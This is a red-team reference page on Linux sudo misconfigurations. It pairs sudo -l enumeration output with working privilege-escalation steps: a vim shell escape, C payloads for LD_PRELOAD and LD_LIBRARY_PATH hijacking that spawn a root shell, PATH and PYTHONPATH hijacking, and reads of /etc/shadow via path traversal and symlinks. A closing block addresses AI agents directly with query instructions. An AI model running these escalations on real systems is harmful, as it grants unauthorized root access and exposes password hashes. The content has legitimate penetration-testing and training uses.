# Sudo Misconfigurations ## Theory On this page, we speak about specific SUDO misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges. ## Practice ### NOPASSWD {% tabs %} {% tab title="Enumerate" %} The following `sudo` configuration allow an user to execute some command with another user's privileges without knowing the password. ```bash $ sudo -l User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/vim ``` {% endtab %} {% tab title="Exploit" %} If you can run a binary with sudo rights, you may want to have look at [GTFOBins](https://gtfobins.github.io/), a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with `vim`, we can spawn a shell with following commands: ```bash sudo -u root vim -c '!sh' ``` {% endtab %} {% endtabs %} ### LD\_PRELOAD {% tabs %} {% tab title="Enumerate" %} `LD_PRELOAD` is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library. If `env_keep+=LD_PRELOAD` is explicitly defined in the `sudo -l` output and you can call some command with sudo, you can escalate your privileges. ```bash $ sudo -l env_reset, env_keep+=LD_PRELOAD User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/find ``` {% endtab %} {% tab title="Exploit" %} To exploit, we can write a shared library ```c //Saved as /tmp/privEsc.c #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash -p"); } ``` compile it ```bash gcc -fPIC -shared -o something.so /tmp/privEsc.c -nostartfiles ``` Then run the sudo binary with `LD_PRELOAD` environement variable ```bash #Use any command you can run with sudo sudo LD_PRELOAD=./something.so #Example sudo LD_PRELOAD=./something.so /usr/bin/find ``` {% endtab %} {% endtabs %} ### LD\_LIBRARY\_PATH {% tabs %} {% tab title="Enumerate" %} the `LD_LIBRARY_PATH` env variable controls the path where libraries are going to be searched. If `env_keep+=LD_LIBRARY_PATH` is explicitly defined in the `sudo -l` output and you can call some command with sudo, you can escalate your privileges. ```bash $ sudo -l env_reset, env_keep+=LD_LIBRARY_PATH User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/find ``` {% endtab %} {% tab title="Exploit" %} To abuse it we can do as follow First, print the shared libraries of the sudo program. We will take `/usr/bin/find` as an example ```bash $ ldd /usr/bin/find linux-vdso.so.1 (0x00007ffd627aa000) libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f6ebe9cc000) libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6ebe8ed000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6ebe70c000) libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f6ebe672000) /lib64/ld-linux-x86-64.so.2 (0x00007f6ebea5f000) ``` Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the `libpcre2-8.so.0` file. ```c //Saved as /tmp/libpcre2-8.so.0.c #include #include #include void _init() { unsetenv("LD_LIBRARY_PATH"); setresuid(0,0,0); system("/bin/bash -p"); } ``` compile it ```bash gcc -o /tmp/libpcre2-8.so.0 -shared -fPIC /tmp/libpcre2-8.so.0.c ``` Then run the sudo binary with `LD_LIBRARY_PATH` environement variable ```bash #Use any command you can run with sudo sudo LD_LIBRARY_PATH=/tmp #Example sudo LD_LIBRARY_PATH=/tmp /usr/bin/find ``` {% endtab %} {% endtabs %} ### SETENV {% tabs %} {% tab title="Enumerate" %} This `SETENV`directive allows the user to **set an environment variable** while executing something: ```bash #Setenv on an arbitrary binary/script $ sudo -l env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh #Setenv on binary/script without the full command path $ sudo -l env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always User waldo may run the following commands on admirer: (ALL) SETENV: find ``` {% endtab %} {% tab title="Exploit" %} The previous example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root: 
#Sudo with modified PYTHONPATH
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
Or, you can set the **PATH** env variable if you can sudo on a binary without the full command path specified. ```bash #Create a malicious find executable echo '/bin/bash -p' > /tmp/find chmod +x /tmp/find #Sudo with modified PATH sudo PATH=/tmp:$PATH find ``` {% endtab %} {% endtabs %} ### Command Path Hijacking {% tabs %} {% tab title="Enumerate" %} If we can execute some command as root but **`env_reset`** and **`secure_path`** are set, we cannot override the **PATH** environment variable. Instead we need to check if we have permission to write each path if a the sudo binary is specified **without the full command path**. ```bash $ sudo -l env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User demo may run the following commands on crashlab: (root) python /home/user/example.py ``` {% endtab %} {% tab title="Exploit" %} We need to check if we have permission to write each path. ```bash ls -al /usr/local/ ls -al /usr/ ls -al / ``` Assume we can write an arbitrary binary file under **`/usr/sbin`**, we can create a payload in there. For example, we create a **`python`** binary under **`/usr/sbin`**. ```bash echo '/bin/bash -p' > /usr/sbin/python chmod +x /usr/sbin/python ``` Then execute the sudo command. ```bash sudo python /home/user/example.py ``` {% endtab %} {% endtabs %} ### Bypassing paths - Wildcard & Symlink {% tabs %} {% tab title="Enumerate" %} If we can execute some command as root and it contains a **wildcard**. We may use **symlinks**, **path traversal** or **multiple arguments** to exploit it. ```bash $ sudo -l env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User demo may run the following commands on crashlab: (root): /bin/less /var/log/* ``` {% endtab %} {% tab title="Exploit" %} We can exploit it by using path traversal technique ```bash sudo less /var/log/../../etc/shadow ``` or we can exploit it by using symlinks technique ```bash ln /etc/shadow /var/log/new sudo less /var/log/new ``` Finally we can try to read 2 files at same time ```bash sudo less /var/log/something /etc/shadow ``` {% endtab %} {% endtabs %} ## References {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/redteam/privilege-escalation/linux/sudo-exploits/sudo-misconfigurations.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.